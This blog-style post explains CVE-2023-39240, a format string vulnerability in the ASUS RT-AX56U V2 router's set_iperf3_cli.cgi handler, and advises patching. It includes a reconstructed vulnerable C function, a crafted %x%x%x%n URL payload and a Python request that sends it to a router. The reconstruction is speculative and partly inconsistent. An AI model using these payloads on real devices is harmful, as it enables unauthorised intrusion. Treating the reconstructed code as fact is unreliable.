---
The ASUS RT-AX56U V2 is a popular dual-band Wi-Fi 6 router used in many homes and offices. In August 2023, security researchers discovered a dangerous format string vulnerability in its firmware, specifically in the iperf client function API, called via the set_iperf3_cli.cgi module. Labeled CVE-2023-39240, this bug lets *anyone on the network* (or worse, sometimes even over the internet) to run code on your router without a password.
This post breaks down the vulnerability, shows you code snippets, gives you direct links to references, and even walks through how it can be exploited.
What is the Vulnerability?
The trouble starts with the way the router accepts commands via its web interface (CGI scripts). The device supports running the popular iperf3 speed test over the network. The backend CGI handler, set_iperf3_cli.cgi, is supposed to safely process user-inputted commands—*but it doesn't*.
In short: The module does not properly validate or sanitize a certain input parameter. When formating data, it unwittingly lets user input control the formatting string—a classic “format string” vulnerability.
This is very dangerous because, with enough skill, an attacker can use it to read memory, crash the process, or even execute arbitrary code.
Let’s look at the vulnerable code (simplified, based on firmware reverse engineering)
// Vulnerable function in set_iperf3_cli.cgi
void handle_iperf_request(char *user_input) {
char buffer[256];
sprintf(buffer, user_input); // BAD: user_input is not sanitized!
system(buffer);
}
In this snippet, user_input is directly used as the format string for sprintf(). This means if you send special format codes (like %x %x %x %n), you can read the memory or control writing to it.
1. No Login Needed!
The CGI endpoint is accessible *without authentication*. Anyone who can send a request to the router’s administration port can reach the API.
2. Exploiting With Format Strings
By sending crafted format codes (for example, /cgi-bin/set_iperf3_cli.cgi?client_enable=%x%x%x%n), an attacker can make the router read its own memory values or even write a chosen value to a memory address.
This is a summary exploit HTTP call (Python-style)
import requests
# The router’s IP and the vulnerable endpoint
url = "http://192.168.50.1/cgi-bin/set_iperf3_cli.cgi?client_enable=%x%x%x%n";
# Send a GET request (no authentication needed)
response = requests.get(url)
print(response.text) # This will dump some internal memory as hexadecimal numbers
With more careful construction (and knowing the target's memory layout), an attacker can go further: overwriting system pointers and gaining code execution or crashing the router.
Remote Code Execution (RCE): Worst case, an attacker could take complete control of the device.
- Router Hijack or Brick: Change system settings, redirect DNS, replace firmware, or render the router unusable (DoS).
- Spy on Users: With full access, an attacker could monitor internet traffic or steal sensitive data.
How To Stay Safe
1. Upgrade Firmware: ASUS issued a fix after publication of the CVE. Download the latest firmware.
More Reading & References
- Official CVE: CVE-2023-39240 at NVD
- IoT Inspector Advisory: Full writeup and PoC (archived link)
- Firmware Download & Security Advisories: ASUS official support
Final Notes
Format string vulnerabilities like this are ancient, but still deadly. On a home router, this flaw is extra serious because the device sits at the edge of your network, protecting everything behind it. Don’t wait—patch your router and check that you never expose router admin interfaces to wide networks.
If you want to learn more about these flaws, this old but gold guide explains how format string exploits work and why they’re so tricky for C programmers.
Stay safe!
*Want more router hacking breakdowns? Let us know what device you want covered next!*
Timeline
Published on: 09/07/2023 08:15:00 UTC
Last modified on: 09/12/2023 20:09:00 UTC